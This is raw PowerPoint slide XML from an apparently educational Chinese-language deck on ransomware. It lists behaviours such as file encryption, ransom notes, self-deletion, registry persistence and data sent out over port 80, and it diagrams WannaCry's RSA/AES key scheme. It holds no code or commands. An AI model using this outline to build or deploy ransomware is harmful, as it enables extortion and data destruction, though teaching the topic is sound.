              <a:t>查找异常。</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7860" y="922020"/>
            <a:ext cx="9511030" cy="2749550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>勒索病毒运行后的行为：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>①将系统内的文本、文档等文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加密</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>②每个文件夹都会生成文字版和图片版的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>勒索信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>③程序会自我复制，自我</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，遍历进程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>④程序会</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>修改注册表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，添加启动项，开机弹出勒索信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>⑤向某</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的80端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>发送数据</a:t>
            </a:r>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55651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中勒索病毒行为</a:t>
              </a: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55651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中勒索病毒行为</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215515" y="781685"/>
            <a:ext cx="8797925" cy="588264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363085" y="0"/>
            <a:ext cx="6665595" cy="6868160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491105" y="612140"/>
            <a:ext cx="1625600" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>勒索软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>运行流程（2017）</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804285" y="1723390"/>
            <a:ext cx="5662295" cy="826135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">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勒索病毒加密过程</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5362575" y="888365"/>
            <a:ext cx="2108200" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>黑客RSA公钥</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4053205" y="1899285"/>
            <a:ext cx="2178685" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户RSA公钥</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7079615" y="1899285"/>
            <a:ext cx="2178685" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户RSA私钥</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3749675" y="3124200"/>
            <a:ext cx="2785745" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件唯一标识符</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7764780" y="3124200"/>
            <a:ext cx="1875790" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AES密钥</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1438275" y="2372995"/>
            <a:ext cx="1275715" cy="1376045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="直接箭头连接符 11"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="2"/>
            <a:endCxn id="4" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5142865" y="1348740"/>
            <a:ext cx="1273810" cy="55054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416675" y="1348740"/>
            <a:ext cx="1752600" cy="55054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528935" y="1899285"/>
            <a:ext cx="1366520" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直接箭头连接符 15"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2713990" y="3351530"/>
            <a:ext cx="1035685" cy="31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3"/>
            <a:endCxn id="10" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6535420" y="3354705"/>
            <a:ext cx="122936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0" idx="2"/>
            <a:endCxn id="11" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5307330" y="353695"/>
            <a:ext cx="164465" cy="6626225"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 244788"/>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776085" y="2876550"/>
            <a:ext cx="694055" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>生成</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2578735" y="4097655"/>
            <a:ext cx="694055" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加密</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2884805" y="2876550"/>
            <a:ext cx="694055" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>生成</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="直接箭头连接符 23"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="9" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5142865" y="2359660"/>
            <a:ext cx="0" cy="76454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255260" y="2508250"/>
            <a:ext cx="694055" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>加密</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4187190" y="4523105"/>
            <a:ext cx="1875790" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>密文保存</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4668520" y="1348740"/>
            <a:ext cx="694055" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>生成</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7623810" y="1348740"/>
            <a:ext cx="694055" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>生成</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="直接箭头连接符 29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9448800" y="2127885"/>
            <a:ext cx="1080135" cy="889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640570" y="1717040"/>
            <a:ext cx="694055" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>生成</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="肘形连接符 31"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7470775" y="1118870"/>
            <a:ext cx="1802130" cy="604520"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 99788"/>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9" idx="2"/>
            <a:endCxn id="26" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5125085" y="3584575"/>
            <a:ext cx="17780" cy="93853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5255260" y="3985260"/>
            <a:ext cx="694055" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>生成</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="文本框 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9787255" y="4267200"/>
            <a:ext cx="2108200" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>黑客RSA私钥</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="直接箭头连接符 35"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="35" idx="0"/>
            <a:endCxn id="15" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10841355" y="2359660"/>
            <a:ext cx="370840" cy="19075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1086465" y="2986405"/>
            <a:ext cx="1105535" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解密，获得用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>私钥</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="图片 38"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="926465" y="4727575"/>
            <a:ext cx="1149985" cy="1229995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="文本框 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925830" y="6080760"/>
            <a:ext cx="922655" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加密后文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41" name="直接箭头连接符 40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1746885" y="3749040"/>
            <a:ext cx="101600" cy="92138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7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6213475" y="3447415"/>
            <a:ext cx="4872990" cy="133794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432040" y="4523105"/>
            <a:ext cx="1473200" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>私钥解密</a:t>
            </a:r>
